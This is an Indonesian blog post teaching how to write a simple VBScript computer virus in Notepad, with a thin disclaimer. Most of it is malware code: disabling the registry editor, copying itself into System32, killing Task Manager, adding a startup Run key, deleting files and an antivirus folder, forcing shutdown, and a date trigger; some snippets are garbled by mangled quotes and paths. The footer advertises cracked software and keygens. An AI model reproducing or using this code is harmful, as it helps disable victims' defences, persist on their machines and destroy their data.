Cara Utama Untuk Bisa Membuat Virus Komputer Via Notepad


Selamat Malam Dan Salam SeJahtera Bagi Kita Semua.
Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.
pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
misalnya:
1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject(”WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d “”1?” /f”, vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject(”WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\
windows\currentversion\policies\systemdisableregistrytools”, 1, “REG_DWORD”
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain
CreateObject(”Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject(”scripting.filesystemobject”).copyfile wscript.scriptfullname,
createobject(”scripting.filesystemobject”)
.getspecialfolder(1) & “\virus.vbs”
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide
4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs”
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject(”WScript.Shell”).run “shutdown -r -f -t 60?, vbhide
merestart windows dalam waktu 60 sekon
7.Meng-ShutDown Windows
CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60?, vbhide
mematikan windows dalam waktu 60 sekon  yang beda cuman
“shutdown -s-f -t 60?
S = untuk shutdown dan
R = untuk reboot\restart
8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
‘(masukkan kode virus disini)
End if
‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
‘dan tahun 2011
Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
walaupun udah sering dibahas di Blog-blog lain,, tapi nggak papalah,,,, itung-itung buat nambahin sedikit Ilmu sobat dalam hal belajar membuat virus komputer melalui Notepad, dan tanpa perlu bahasa Pemprograman.

  Sekianlah sedikit Ilmu yang bisa saya sampaikan pada malam ini dari beberapa pengalaman Pribadi saya sewaktu mencoba belajar membuat Virus komputer.


  Semoga bermanfaat Sob..\(^_^)/


   Salam SeJahtera ..:: Natan auto software ::..

0 komentar:

Poskan Komentar

Check Page Rank

Check Page Rank of your Web site pages instantly:

This page rank checking tool is powered by Page Rank Checker service

 
SELAMAT DATANG DI NATAN AUTO SOFTWARE | DAPATKAN FREE SOFTWARE TERBARU, FULL VERSION, FULL CRACK, PATCH, KEYGEN SERTA TIPS N TRIK MENGENAI KOMPUTER, | DAN JANGAN LUPA UNTUK MEMBERIKAN COMENTAR/SARANNYA. | ATAS PERHATIANNYA, SAYA UCAPKAN TERIMA KASIH BANYAK ATAS KUNJUNGAN ANDA.